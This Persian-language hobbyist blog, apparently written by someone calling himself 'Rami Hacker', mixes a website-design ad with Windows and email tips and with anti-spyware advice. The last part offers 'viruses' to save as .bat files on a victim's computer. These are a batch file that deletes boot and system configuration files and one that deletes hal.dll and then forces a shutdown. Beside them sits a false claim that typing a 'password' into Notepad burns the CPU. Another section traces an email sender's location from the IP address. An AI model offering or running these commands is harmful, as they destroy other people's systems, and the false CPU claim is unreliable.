سکوی پرتاب

طراحی انواع سایتهای حرفه ای تنها با 79000 تومان. تعداد طراحی محدود می باشد لذا هرچه زودتر سفارش خود را ارسال کنید.

جهت سقارش درخواست خود را به همراه ایمیل از بخش نظرات ارسال کنید.

-----------------------------------------------------------------------------------------------------------

اگر هزینه طراحی سایت را ندارید،سایت مورد نظر خود را از از سایتهای اینترنتی انتخاب و با هزینه بسیار اندک یک نسخه از آن را تحویل بگیرید.

تاپ تیزر

www.toptizer.ir

با استفاده از این ترفند مي تونيد بر حسب اسم ، فاميل ، شهر ، کشور ، سن و یا وضعيت تاهل اعضای سایت یاهو رو سرچ کنيد. البته کافیست برای جستجو حتی از یکی از موارد فوق استفاده نمایید.براي جستجو باید به این صفحه برید: http://members.yahoo.com

به همین راحتی!!!!!!!

رامی هکر

اگر از آن دسته از کاربران حرفه ای باشید که زیاد با رجیستری ویندوز سر و کار دارند مسلمأ با پیچیدگی ها و تو در تویی های رجیستری آشنایی دارید. آدرسهای طولانی در ساختار رجیستری وجود دارد که برای هر بار دسترسی به آنها باید زمان نسبتأ زیادی را صرف کنید. در این ترفند قصد داریم یک روش بسیار عالی را به شما معرفی کنیم که با بهره گیری از آن میتوانید یک قسمت Favorites به رجیستری اضافه کنید که با استفاده از آن هر چه سریعتر میتوانید به آدرسهای مختلف رجیستری دسترسی پیدا کنید.بدین منظور:از منوی Start وارد Run شده و دستور regedit را وارد کنید و Enter بزنید تا ویرایشگر رجیستری ویندوز باز شود.اکنون به یک آدرس یا کلیدی که زیاد با آن سر و کار دارید بروید. حال از منوی بالا و قسمت Favorites گزینه Add to Favorites را انتخاب کنید.حالا یک نام برای این قسمت انتخاب کنید و OK را انتخاب کنید.اکنون اگر در هر قسمتی از رجیستری باشید ، کافی است مجدد از منوی Favorties بخشی که ایجاد کردید را انتخاب کنید تا مستقیم و سریع به آن بخش هدایت شوید.به همین راحتی!!!!!

اگه مشکلی هست حتما در قسمت نظرسنجی درج کنید....رامی هکر حدودا همیشه انلاین است!!!

اين ترفند مربوط ميشه به پاك كردن اكانت سرويس ايميل ياهو. ممكنه كه تا حالا براتون پيش اومده باشه كه بخواهيد به واسطه ساختن يك اكانت ايميل جديد ، بخواهيد ايميل قبلي خود را پاك كنيد.اين امكان تقريبا ميشه گفت يكي از امكانات پنهاني ياهو است كه به طور آشكارا در اختيار كاربرانش قرار نداده.براي اين كار ابتدا شما بايد به اين لينك مراجعه كنين : https://edit.yahoo.com/config/delete_user وقتي كه بروي اين لينك كليك مي كنيد .وارد يكي از صفحه هاي سايت ياهو ميشويد،سپس در اين صفحه نام USER و PASSWORD ايميل خود را كه مي خواهيد پاك شود را وارد كنيد سپس وارد صفحه ديگه ايي ميشيد،در اين صفحه هم در قسمت پايينش دوباره يوزر و پسوردتون رو وارد كنيد،اكنون بروي كليد YES و يا همون Terminate this Account كليك كنيد.نکته : بدين ترتيب ايميل شما به طور كامل از روي سرور ياهو پاك ميشه و هيچ راه برگشتي هم نداره.!!                                                               Rami Hacker

كامپيوتر شما، چه سه ساله باشد، چه سه روزه، با مشكلات امنيتي يكساني مواجه است كه گاهي بسيار خطرناك هستند. ويروس‌ها مي‌خواهند به محض آمدنتان به روي خط، وارد سيستمتان شوند. جاسوس‌افزارها بر پشت نامه‌ها سوار‌مي‌شوند و سعي مي‌كنند همراه با تبليغات وارد سيستم شما شوند. تروجان‌ها در كمين مي‌نشينند و با اولين غفلت، نفوذ‌مي‌كنند. راه‌هاي مختلفي براي مقابله با اين خطرات وجود دارد. در این ترفند سعي خواهيم‌كرد ضمن معرفي خطرات امنيتي، روش‌هاي مقابله با هر يك را توضيح دهيم. لازم به ذكر است كه اين نكات هيچ ترتيب خاصي ندارد و اولويت در مطرح كردن هر يك از آن‌ها، دليل مهم بودن آن برساير موضوعات نيستهشدارهاي امنيتي را جدي نگيريد!پنجره‌هاي pop up به خودي خود مزاحم هستند؛ چه برسد به اين كه هشدار بدهند سيستم شما داراي يك مشكل امنيتي است. فروشندگان محصولاتي كه ظاهراً نرم‌افزارهاي ‌‌امنيتي هستند، با ترساندن كاربران ساده و بي‌دقت، آن‌ها را ترغيب به دانلود نرم‌افزارهاي مزبور‌مي‌كنند، يا آن‌ها را طوري از خطري كه وجود ندارد مي‌ترسانند كه مجبور‌شوند حداقل سري به سايتشان بزنند. بعيد است تا‌كنون با چنين پنجره‌هاي هشدارآميزي هنگام گشت‌زدن در وب مواجه نشده‌‌باشيد.بعضي وقت‌ها شكل پنجره‌ها طوري است كه گويا از طرف ويندوز هشدار مي‌دهد. اما چنين نيست و اين‌ها فقط تبليغ هستند. گاهي يك علامت كمرنگ (تبليغ) در پايين اين پنجره آمده است. ولي طراحي صفحه طوري است كه كاربر به آنجا توجه نمي‌كند و فكر مي‌كند هر چه زودتر بايد كاري بكند. به همين‌خاطر، بي‌محابا روي دكمهYes كليك مي‌كند تا شايد نجات يابد. اما روي هر چه كليك كند (چه Yes ، چهNo، چه هر جاي ديگر)، به سايت فروشنده هدايت مي‌شود تا نرم‌افزار را دانلود كند.در اينجا قصد نداريم اسمي از چنين فروشنده‌هايي بياوريم يا محصول خاصي را نام ببريم. مهم اين است كه هر كس مي‌تواند يك صفحه وب pop up را طوري طراحي كند كه شبيه به كادرهاي ويندوز باشد و كاربر فكر‌كند واقعاً با يك مشكل امنيتي مواجه شده كه ويندوز دارد هشدار مي‌دهد. حتي بعضي از آن‌ها با جعل المان‌هاي ويندوز (مثل منوي programs) براي كاربرِ از همه جا بي‌خبر، هيچ ترديدي را باقي نمي‌گذارند كه كل قضيه را باور كند. حال‌آن‌كه ماجرا به‌كلي دروغ است.حال سؤال اين است كه چگونه مي‌توان چنين پنجره‌هايي را از هشدارهاي واقعي ويندوز تشخيص داد. اولاً حتي اگر وحشتناك‌ترين هشدار را هم ديديد، نبايد هول شويد و عجولانه كاري بكنيد. ثانياً اگر به خط عنوان و پايين صفحه نگاه كنيد، حتماً مي‌توانيد تشخيص‌دهيد كه يك پنجره Inteet‌‌Explorer است يا پنجره‌اي جعلي. البته اين صرفاً سرنخ است و برهان قاطع نيست.واقعاً ممكن است ويندوز يا يكي از نرم‌افزارهاي نصب شده در سيستم ‌شما (از جمله برنامه ضدويروس‌) چنين پنجره‌اي را ظاهر كرده باشد. اما احتمال اين حالت خيلي ضعيف است و شما در اكثر موارد مي‌توانيد فرض بگيريد كه با يك پنجره تبليغاتي مواجه هستيد. ولي اگر مردد هستيد، روي پنجره كليكِ راست كنيد و گزينه Properties را بزنيد.با اين كار معلوم مي‌شود كه صفحه از طرف كدام سايت نشان داده شده است. ديالوگ كادرهاي واقعي IE گونه، آدرس غيراستانداردي دارند كه با چيزي مثل: ‌res آغاز مي‌شود. اما پنجره‌هاي تبليغاتي يك آدرس واقعي وب دارند. مهم اين است كه عجولانه نسبت به پيام عكس‌العمل نشان ندهيد، بلكه مكث كنيد و با دقت پيام را بخوانيد. خيلي اوقات از محتواي پيام هم مي‌توان به دروغ بودن آن پي برد.مراقب آرشيو مكاتبات آنلاين باشيدفهرست‌هاي پستي (mailing list) مرجع خوبي براي به دست آوردن هر نوع اطلاعات هستند؛ به ويژه آرشيو اين فهرست‌ها كه به اينترنت پست شده‌اند. پيام‌هايي كه در اين فهرست‌ها بين اعضا رد و بدل مي‌شود، غالباً به صورت آرشيوهاي قابل جستجو در دسترس هستند و جستجوگراني چون گوگل و غيره آن‌ها را پيدا مي‌كنند. با اين كه اين مجموعه مكاتبات نعمت بزرگي براي محققان هستند، اما مي‌توانند پناهگاه ويروس‌ها و ساير خطرات اينترنتي هم باشند.اگر سرور آرشيوكننده نظارتي بر ويروس‌ها نداشته‌‌باشد و ضمايم نامه‌ها را آزاد بگذارد، ممكن است پيام‌هايي را آرشيو كرده باشد كه حاوي فايل‌هاي آلوده‌كننده هستند. خودتان مي‌توانيد امتحان كنيد. مثلاً در گوگل به جستجوي فايل postcard.pif بپردازيد، يعني فايل آلوده‌اي كه در بسياري از كرم‌هاي سري W۳۲/Netsky به كار رفته‌است. نتيجه جستجو قطعاً پر از لينك‌هايي به پيام‌هايي در آرشيو فهرست‌هاي پستي خواهد بود كه نسخه فعالي از اين ويروس را به عنوان ضميمه دارند. كليك روي يكي از اين ضمايم در آرشيوهاي مزبور، سيستم را بلافاصله آلوده مي‌كند.نرم‌افزار ضدجاسوسي و ضدتبليغاتي را به‌درستي انتخاب كنيدامروزه جاسوسي اينترنتي، براي كاربران كامپيوتر به واقعيتي گريزناپذير تبديل شده است. حاصل كمي غفلت هنگام گشت‌زدن در وب، ممكن است مرورگر <هاي‌جك> شده، كوكي‌هاي متجاوز و پاپ‌آپ‌هاي تمام‌نشدني باشد. بسياري از كاربران براي اين‌كه از شر اين پليدي‌هاي اينترنت در امان بمانند، به نرم‌افزارهاي ضدجاسوسي(antispyware) پناه مي‌برند.اما اگر انتخاب برنامه‌هاي ضدجاسوسي و ضدتبليغاتي از روي دقت صورت نگيرد، درمان ممكن است بدتر از خود مرض از آب در بيايد. اگر به دنبال راهي براي مقابله با پاپ‌آپ‌ها هستيد، گوگل، ياهو و MSN ابزارهاي خوبي براي مسدود‌كردن اين پنجره‌ها را به‌طور رايگان عرضه ‌‌مي‌كنند.خود اينترنت اكسپلورر، اگر سرويس‌پك ۲ ويندوز اكس‌پي را نصب كرده باشيد، يك pop up blocker قوي دارد. بسياري از برنامه‌هاي ضدويروس خوب هم امروزه به پاپ‌آپ بلاكر مجهزند. بنابراين نيازي به تهيه جداگانه اين برنامه نيست.مشهورترين برنامه‌هاي ضد‌جاسوسي در حال حاضر، سه محصول Ad-Aware ،Spybot Search and Destroy وSpySweeper هستند. كه تمام آن‌ها نسخه رايگان هم دارند. نسخه رايگان اين برنامه‌ها، هم اسكن‌‌مي‌كند و هم بيشتر جاسوس‌افزارها، تبليغ‌افزارها و به‌طوركلي كدهاي پليد را از بين‌‌مي‌برد. اما يك سري از برنامه‌هاي ضد‌جاسوسي هم وجود‌‌دارند كه به برنامه‌هاي <ولگرد> يا <مشكوك> موسومند.اين برنامه‌ها از طريق يك پاپ‌آپ تبليغ مي‌شوند كه مدعي است هر پليدافزاري را از روي سيستم شما پاك مي‌كند با اين‌حال اين برنامه‌ها به قدري سمج هستند و آن قدر كاربر را تحت فشار‌‌مي‌گذارند تا مجبور‌شود پيشنهاد دانلود را بپذيرد.يكي از نشانه‌هاي برنامه‌هاي ولگرد اين است كه دانلود و اسكن به طور رايگان انجام مي‌شود. اما موقع پاك كردن كه مي‌رسد، مي‌گويند بايد برنامه را بخريد. حتي بعضي از آن‌ها به دروغ اعلام مي‌كنند كه سيستم گرفتار جاسوس‌افزار است و كاربر را مجاب مي‌كنند كه برنامه را بخرد. بدترين نمونه از اين نرم‌افزارها، كه برخي سايت‌ها آن‌ها را <اخاذافزار /‌extortion-ware> ناميده‌اند، خودشان در سيستم مشكل ايجا مي‌كنند و حتي uninstall هم نمي‌شوند و كاربر را مجبور مي‌كنند براي گرفتن uninstaller، خود نرم‌افزار را بخرند.حال سؤال اين است كه چه بايد كرد؟ چگونه مي‌توان يك محصول قانوني و مشروع را از يك برنامه فريبكار و نامشروع تشخيص داد؟ يك قاعده كلي اين است كه اگر فروشنده‌اي تبليغ كند كه نرم‌افزارش سيستم شما را از شر جاسوس‌افزارها و تبليغات خلاص مي‌كند، به احتمال زياد خودش جاسوس‌افزار است. تبليغات پاپ‌آپ و banner غالباً ادعا‌‌مي‌كنند كه سيستم به جاسوس‌افزار آلوده شده‌است.گرچه بعضي از محصولات تجاري ضدجاسوسي پيشنهاد اسكن رايگان سيستم را ارائه مي‌دهند، ولي پيشا‌پيش ادعا نمي‌كنند كه كامپيوترتان آلوده است.طبق يك نظرسنجي كه شركت‌هاي WebRoot و AOL انجام داده‌اند، بيش از ۹۰‌درصد كاربران كامپيوتر، در سيستم خود شكلي از جاسوس‌افزار را دارند. بنابراين، اسكن مستمر سيستم، يك ضرورت است. ابتدا از يكي از اين اسكنرها و پاك‌كننده‌هاي رايگان استفاده‌‌كنيد. سايت SpywareWarrior.com فهرستي از نود برنامه آزمايش شده را ارائه داده است كه (در ضدجاسوس‌افزار بودن آن‌ها ترديد وجود دارد). با اين كه تمام برنامه‌هايي كه در اين سايت معرفي شده‌اند ممكن است بد نباشند، ولي منطق حكم مي‌كند به طرف آن‌ها نرويد.بعضي از سايت‌هايي كه برنامه‌هاي ضد‌جاسوسي ولگرد را تبليغ‌مي‌كنند و سايت‌هايي كه خودشان به انتشار جاسوس‌افزار و كدهاي مخرب مي‌پردازند، با استفاده از نقاط ضعف ويندوز و اينترنت اكسپلورر، نصب‌هاي (تحميلي) انجام مي‌دهند و به نمايش پاپ‌آپ‌هاي تمام‌نشدني مي‌پردازند. بروز نگه‌داشتن ويندوز يكي از آسان‌ترين راه‌ها براي مقاوم‌شدن در برابر اين تهديدات است. از آنجا كه بعضي برنامه‌هاي ضد‌ويروس، قابليت‌هاي ضدجاسوسي هم دارند، بروز نگه‌داشتن آن‌ها هم كار خوبي است.Spybot S&D ،SpySweeper و برخي ديگر از محصولات خوشنام نيز سيستم شما را در مقابل بعضي از اين سايت‌ها مقاوم مي‌كنند. قابليت معرفي سايت‌هاي ناامن در منطقه امنيتي اينترنت اكسپلورر (Security Zone) يكي از ويژگي‌هاي خوب اين مرورگر است كه به آساني در دسترس است. سايت SpywareGuide.com فهرستي از سايت‌هاي مخرب را به‌طور رايگان ارائه مي‌دهد كه مي‌توانيد به Security‌Zone اينترنت اكسپلورر معرفي كنيد.بلوكه كردن پاپ‌آپ‌ها، راه ديگري براي مواجهه با اين مشكل است. اگر از سيستم‌عاملي غير از ويندوز اكس‌پي استفاده مي‌كنيد، يا هنوز سرويس‌پك۲ ويندوز اكس‌پي را نصب نكرده‌ايد، مي‌توانيد از برنامه‌هاي شركت‌هاي ديگر، مثل MSN، ياهو و يا گوگل براي مسدود‌كردن پاپ‌آپ‌ها استفاده كنيد.در مجموع، دور نگه‌داشتن سيستم از شر جاسوس‌افزارها، تبليغ‌افزارها و به‌طوركلي برنامه‌هاي مخرب، احتياج به دقت و هشياري دارد. بيشتر كاربراني كه از پاپ‌آپ‌ها و جاسوس‌افزارها شكايت دارند، به خاطر اين است كه آگاه نيستند اين چيزها چگونه به كامپيوترشان راه پيدا مي‌كنند. به پيام‌هايي كه پيشنهاد نصب يك نرم‌افزار را به شما مي‌دهند، خوب دقت كنيد و چشم بسته قبول نكنيد. اگر برنامه‌اي را از قبل نمي‌شناسيد، بدون خواندن <توافق‌نامه كاربر> اقدام به نصب آن نكنيد. اگر چيز مشكوكي را ديديد، روي هيچ دكمه‌اي كليك نكنيد (نه Yes و نه No)، و بلافاصله پنجره را ببنديد (كليد Alt+F۴ را بزنيد).سرقت مرورگرسرقت صفحه يا هايجك‌كردن مرورگر (browser hijack يا مرورگرربايي) يكي از رايج‌ترين آزارهاي اينترنتي (بيشتر از ويروس و كرم) است كه كاربران خانگي و حتي شركتي را گرفتار كرده است. هدف از اين كار، اولاًً هدايت كردن وب‌گردها به يك سايت جستجوگر خاص و ثانياً نظارت بر فعاليت آن‌ها به منظور هدفمند‌كردن تبليغات (در قالب پنجره‌هاي پاپ‌آپ) مي‌باشد. هايجك كردن مرورگر چيزي بين malware و adware است.انگيزه اين كار بر خلاف ويروس‌ها، پول درآوردن است؛ پولي كه از فروش فضاي تبليغاتي در وب و فروش خدمات و كالاهاي تبليغ‌كنندگان به دست مي‌آيد. البته برخي از سارقان مرورگرها، با backdoor و تروجان‌هايي همراهند كه به فروشندگان امكان دانلود برنامه‌هاي مخرب و جمع‌آوري كليدضربه‌ها و ساير اطلاعات خصوصي را مي‌دهند.متأسفانه هيچ راه يكساني براي از بين‌بردن تمام اين نرم‌افزارها وجود‌ندارد. تكنيك‌هاي هايجك‌كردن مرورگر، امروزه بسيار پيچيده شده‌اند. از صفحات ساده‌اي كه با استفاده از كدهاي جاوا اسكريپت صفحه پيش‌فرض را تغيير مي‌دهند گرفته تا موجوداتي مثل Smartsearch.WS كه با تغيير رجيستري كاري مي‌كنند كه اگر كاربر فراموش كرد پيشوند HTTP را تايپ كند، خود به خود هر صفحه را به سايت خودش تغيير جهت دهد.بهترين راه براي مقابله با هايجك‌كننده‌هاي مرورگر، پيشگيري از آن‌هاست. بيشتر هايجك‌ها با تعامل خود كاربر صورت مي‌گيرند. وقتي كاربر به ديدن صفحات خاصي از وب مي‌رود، با پاپ‌آپي مواجه مي‌شود كه پيشنهاد دانلود يك نرم‌افزار، يك چيز رايگان، يا در ساده‌ترين شكل، تغيير صفحه شروع مرورگرش را مي‌دهد. در اين مواقع فقط يك كار صحيح است؛ رد پيشنهاد.اخيراً برخي از هايجكرها به روش‌هاي ويروس‌گونه روي آورده‌اند و از نقاط ضعف اينترنت اكسپلورر سوءاستفاده‌ مي‌كنند. نقطه ضعف MHTRedir يك سري تروجان را پوشش مي‌دهد كه غالباً براي دانلود تماس‌گيرنده‌هاي مستهجن و اخيراً كرم Bagle.AQ به‌كار گرفته مي‌شوند. البته مايكروسافت اين نقطه ضعف را با روزآمدسازي امنيتي MS۰۴-۰۲۵ خود ترميم كرده است. بنابراين اگر سيستم‌شما بروز باشد، كمتر مورد آسيب قرار‌مي‌گيرد. محصولات ضدويروس هم، بسياري از اين نوع تروجان‌ها را شناسايي مي‌كنند. بنابراين به كمك اين برنامه‌ها هم مي‌توانيد جلوي هايجك‌شدن را از همان ابتدا بگيريد.اما اگر بعد از همه اين مراقبت‌ها باز هم گرفتار هايجك شديد، برنامه‌هايي مثلHijack This ،Ad-aware ،Spybot S&D و SpySweeper احتمالاً مشكل شما را حل‌مي‌كنند. همچنين سايت‌هايي چون Scumware.com ،MVP.org ،Spywareinfo.com و MajorGeeks.com مي‌توانند مفيد باشند.

واااااااااااای!!!!!!!!!!!!!!!!!!!!!!!مردم اینقدر نوشتم!!!!!!!نویسنده:رامی هکر

نظر بده

ممکن است شما نیز تا به حال در جستجوی کرک برنامه ها و بازی ها بوده اید ، اما متاسفانه سایتهای بسیاری وجود دارد که از این حربه برای فریب کاربران استفاده میکنند و برنامه های آلوده به ویروس خود را به جای کرک های برنامه ها به مردم تحویل میدهند. در این ترفند قصد داریم روشهای مفیدی را معرفی کنیم که میتوانید این کرکهای آلوده را که حتی بسیاری از آنتی ویروس ها در تشخیص آنها ناکام هستند ، خودتان تشخیص دهید.برای استفاده از کرک این سایتها باید به موارد زیر توجه کرد:۱-حتما قبل از باز کردن فایل آنرا با Antivirus خود چک کنید. (ترجیحا Kaspersky ) توجه داشته باشید که آنتی ویروستان داخل فایلهای فشرده مثل zip، rar و … و نیز فایلهای Exe selfextract را باید پک کند.۲-دستورالعمل داخل فایل *.nfo را بخوانید(به جای * نام فایلتان است!) فایلهای مورد نیاز (که غالب اوقات ویروسی نیستند) در آن ذکر شده است. بنابراین فایلهای دیگر را هر گز اجرا نکنید. (این فایل را باید با notepad یا نرم افزارهای مشابه آن باز کرد)۳-فایلهایی با نامهای crack.exe، run.exe، NiTROUS.exe و… غالبا ویروسی هستند. سعی کنید آنها را تا مطمئن نشدید (مثلا از طریق آنتی ویروس) اجرا نکنید. توصیه می کنم آنها را بلافاصله پاک کنید!در ذیل مثالی از سایت crackz.ws را (که در زمینه ی ویروس ید طولایی دارد!) می آورم:فایل انتخاب شده Kaspersky Anti-Virus v۶.۰.۰.۳۰۰ است.برای دریافت آن به آدرس http://crackz.ws/down/۱۵۷۵۹۳/Kaspersky.Anti-Virus.v۶.۰.۰.۳۰۰_crack.html می رویم و “Download Crack” را انتخاب می کنیم. (توجه داشته باشید که گاهی قبل از انتخاب Download Crack صفحه ای باز می شود که باید آنرا بست. چون یک ویروس است!)نام فایل twk۶۳۰ea.exe است. این فایل را با winrar باز کنید (هرگز اجرایش نکنید!)فایل run.exe ویروس است. آنرا باید پاک کنید.(همانطور که در twk.nfo نامی از آن برده نشده است!) در ضمن این فایل را بسیاری از antivirusهای تشخیص نمی دهند. رامی هکر!!!!

Spyware ها ( نرم افزار جاسوسی ) نرم افزارهایی هستند که مخفیانه خود را بر روی سیستم شما نصب می نمایند. این نرم افزارها خود را به گونه پیکربندی می کنند که در هر بار راه اندازی سیستم بار گذاری شده و در پس زمینه سیستم قرار می گیرند و پس از قرارگیری در پس زمینه سیستم ، کلیه فعالیت های کامپیوتر مورد نظر را تحت نظر می گیرند.
آموزشی که امروز می خواهم بدهم نحوه تشخیص و غیر فعال کردن عملکرد نرم افزار های جاسوسی توسط خودمان و بدون نیاز به نرم افزار می باشد . در واقع روشی که می خواهم بیان کنم بسیار ساده و با استفاده از یکی از قابلیت های ویندوز xp می باشد هر چند این روش تا حدود 80 درصد می تواند در تشخیص نرم افزار های جاسوسی مفید باشد ولی در نوع خود می تواند بسیار مفید باشد .

وقتی شما آنتی ویروسی بروی کامپیوتر خود نصب می کنید بخشی از ساختار برنامه ریزی شده برای نرم افزار آنتی ویروس ، ارتباط با اینترنت و مرکزی می باشد که باید هر چند وقت یکبار با آن مرکز در ارتباط باشد تا از آخرین لیست ویروس های جدید و نحوه مقابله با آن آگاه شود که این کار توسط خود کاربر و با استفاده از بروز کردن ( update ) کردن آنتی ویروس انجام می شود و یا مثلا نرم افزار های رایگانی همچون RealOne Player را وقتی بروی کامپیوتر نصب می کنید و به اینترنت وصل می شود مشاهده می کنید که تبلیغاتی اینترنتی در داخل نرم افزار برای شما نمایش داده می شود پس این نوع نرم افزار های رایگان نیز در بخشی از ساختار برنامه ریزی شده برای آنها نیازمند ارتباط با مرکز خود در اینترنت می باشند . نرم افزار های جاسوسی نیز برای گزارش عملکرد کامپیوتری که آنرا تحت کنترل قرار داده اند باید با مرکز مورد نظر خود در اینترنت در ارتباط باشند پس نوع عملکرد نرم افزار های جاسوسی نیز شبیه آنتی ویروس ها ، نرم افزار های رایگان و ... می باشد با این تفاوت که عملکرد کامپیوتر شما را بدون اجازه شما به مرکزی در اینترنت گزارش می دهد و به نوعی در حال جاسوسی از اطلاعات محرمانه شما می باشد .

حال سوالی که پیش می آید این است که آیا در ویندوز xp بخشی وجود دارد که لیستی از این نرم افزار ها که در برخی از شرایط ممکن است به اینترنت وصل شوند را نمایش دهد تا بتوان از میان این لیست ، نرم افزار های جاسوسی را تشخیص و غیر فعال کرد ؟؟؟ بله در برگه Exceptions در بخش Windows Firewall .

برای دسترسی به این بخش بعد از ورود به کنترل پنل ویندوز xp بروی آیکون Windows Firewall کلیک کنید و بعد از باز شدن پنجره Windows Firewall بروی برگه Exceptions کلیک کنید . در این برگه شما می توانید لیستی از نرم افزار هایی که ممکن است در برخی از شرایط برای اهداف مختلف به اینترنت متصل شوند وجود دارد . در این لیست به دقت به اسم نرم افزار های مختلف توجه کنید و هر اسمی که در این بخش برای شما ناآشنا بود غیر فعال ( بلوک ) کنید یعنی تیک کنار نام مورد نظر را بر دارید .

البته نگران این قضیه نباشید که اگر به اشتباه نام یک نرم افزار کاربردی را غیر فعال کنم امکان استفاده از این نرم افزار و وصل شدن آن به اینترنت وجود ندارد بلکه باعث می شود فقط نرم افزار بدون اجازه شما در زمانی که شما به اینترنت وصل می باشید با مرکز مورد نظر خود در ارتباط نباشد . با استفاده از این روش شما به راحتی می توانید عملکرد بسیاری از نرم افزار های جاسوسی را در کامپیوتر خود غیر فعال کنید . در انتها بد نیست این نکته را بگم که برخی از کوکی ها که به واسطه مراجعه به برخی از سایت ها ممکن است در کامپیوتر شما نصب شوند نیز می توانند به مانند نرم افزار های جاسوسی عمل کنند پس بهتر است هر دو هفته یک بار کلیه کوکی ها خود را از طریق اینترنت اکسپلورر پاک کنید .

نوشته رامی هکر

مروز قصد دارم روشی را برای دوستان بیان کنم که بتوانند موقعیت مکانی ارسال کننده ایمیل را از طریق IP پیدا کنند .این ترفند رو خودم(رامی هکر)کشف کردم!!!! 

برای انجام این کار ابتدا باید IP ارسال کننده ایمیل را بدست بیاورید که نحوه بدست آوردن IP در میل یاهو GMail را به طور جداگانه توضیح می دهم :

بدست اوردن IP ارسال کننده ایمیل در یاهو (Mail Beta ) :

بعد از ورود به حساب خود در یاهو بروی یکی از نامه های ارسالی دوبار کلیک کنید تا نامه مورد نظر در پایین صفحه نمایش داده شود . بعد از باز شدن نامه ارسالی در بالای نامه  بروی عبارت Compact Header ( یا Standard Header ) کلیک کنید و از منوی حاصل بروی عبارت Full Header کلیک کنید .
بعد از کلیک بروی عبارت Full Header صفحه ای جدید  برای شما باز می شود . در این صفحه به دنبال عبارت Received: from بگردید . البته در این صفحه ممکن است عبارت Received: from جند بار تکرار شده باشد که ما آن Received: from را می خواهیم که در بالای آن آدرس ارسال کننده ایمیل درج شده است . بعد از پیدا کردن Received: from مورد نظر در مقابل این عبارت شما به راحتی می توانید IP ارسال کننده ایمیل را بدست بیاورید
 

بدست اوردن IP ارسال کننده ایمیل در GMail :

بعد از ورود به حساب خود در GMail بروی یکی از نامه های ارسالی دوبار کلیک کنید تا نامه مورد نظر باز شود . در بالای نامه دکمه ای با نام Reply وجود دارد . بروی آن کلیک کنید و از منوی حاصل عبارت Show Original را انتخاب کنید . اینک مشابه میل یاهو که بروی عبارت Full Header کلیک کردید در GMail نیز صفحه ای باز می شود که در این صفحه نیز باید به دنبال عبارت Received: from بگردید که نکاتی که در مورد پیدا کردن Received: from صحیح در یاهو گفتم در GMail نیز صادق می باشد .

بدست آوردن محل ارسال کننده ایمیل از طریق IP :

بعد از اینکه شما IP ارسال کننده ایمیل را بدست آوردید کافیست این شماره IP را در سایت هایGeoBytes IP Locator و یاIP2Location قرار دهید تا از موقعیت مکانی ارسال کننده ایمیل مطلع شوید . البته این دو سایت هر کدام دارای ویژگی های خاص خود می باشد ولی سایتGeoBytes IP Locator اطلاعات دقیق تری از موقعیت IP به شما می دهد و همچنین تشخیص می دهد که ارسال کننده ایمیل از پروکسی ( proxy ) یا نرم افزار های مخفی کننده IP استفاده کرده است یا نه ، که این مورد در برخی مواقع می تواند بسیار مفید باشد که با دانستن این موضوع و اینکه ارسال کننده نامه از پروکسی ( proxy ) استفاده کرده است می توان به امنیت نامه های ارسالی شک کرد . همچنین با ورود به سایتGeoBytes IP Locator این سایت IP و موقعیت مکانی شما را به خودتان نشان می دهد .

بدست آوردن MAC Address، چرا و چگونه؟

با استفاده ازاین ترفند می توانید کاری کنید که پیش از بالا آمدن کاملویندوز و قبل از نمایش Welcome متنی را قرار دهید که این قابلیت را داردکه فارسی باشد و در یک پنجره کوچک نمایش داده شود. به عنوان مثال خوشآمدگویی به کاربر باشد یا در صورتی که در یک کافی نت مشغول کار باشیدقوانین آن مکان را نمایش دهد

بدین منظور در Run تایپ کنید regedit تا رجیستری باز شود.
سپس یه کلید مقابل بروید: [HKEY_LOCAL_MACHINE / Software / Microsoft / Windows / CurrentVersion / Winlogon]
و دو مقدار رشته ای به نامهای LegalNoticeCaption وLegalNoticeText بسازید.
در LegalNoticeCaption نام کادر پیغام و به LegalNoticeText متنی که دوست دارید نمایش داده شود را بنویسید..........به همین راحتی!!!ترفند جدید از رامی هکر

این ویروس برای سوزاندن cpu هست طوری که وقتی کسی در کامپیوترش notepad رو باز میکنه و در اون رمز ما رو که:       cpu_567hjkblaster        هست رو تو کامپیوترش تایپ کنه و باهر اسمی ولی با پسوند bat.   مثل:    thebesthacker.bat          در هر جای کامپیوترش سیو کنه کامپیوترش reset میکنه و وقتی دوباره windows بالا بیاد تمام برنامه های کامپیوتر قربانی پاک شده.این ویروس را روی کامپیوتر خودتون امتحان نکنید!!!!!!!!

توجه!!                 !!!                             توجه!!!

پیغام مهم رامی:هر گونه استفاده ی نا به جا به عهده ی خود  کاربر می باشد.

امروز میخوام یه کد بهتون بدم که اگه اونو تو notepad  تو کامپیوتر قربانی تایپ کنیدو با هر اسمی ولی با پسوندbat. مثل hacker.bat سیو کنید کامپیوتر قربانی reset میکنه و بعد از اجرا شدن دوباره windows بعد از 30 ثانیه دوباره reset میکنه!!!! اینم کدمون: 

del autoexec.bat del config.sys cd winnt del system.ini del win.ini

این ویروس رو رو کامپیوتر خودتون امتحان نکنید!!

توجه:هر گونه سو استفاده به عهده ی خود کاربر می باشد.رامی هکر

میخوام یه ویروس بگم که خیلی دوستش دارم اینم مثل قبلیا با نوت‌‌پده فقط اینو با پسوند bat. مثل virus.bat ذخیره کنید تا کامپیوتر طرف از این رو به اون رو بشه اینم کدمون:

del c:WINDOWSsystem32hal.dll

del c:WINDOWSsystem32hal.dll

del c:WINDOWSsystem32hal.dll

del c:WINDOWSsystem32hal.dll

del d:WINDOWSsystem32hal.dll

del d:WINDOWSsystem32hal.dll

del d:WINDOWSsystem32hal.dll

del d:WINDOWSsystem32hal.dll

shutdown -s -c "shutdown your computer" -t 20

shutdown -s -c "shutdown your computer" -t 20

shutdown -s -c "shutdown your computer" -t 20

shutdown -s -c "shutdown your computer" -t 20

logoff

logoff

لطفاً نظربدین!

استفاده ی نابجا به عهده ی خودکاربرمی باشد!!!!

تروجان ها چگونه كار می كنند؟

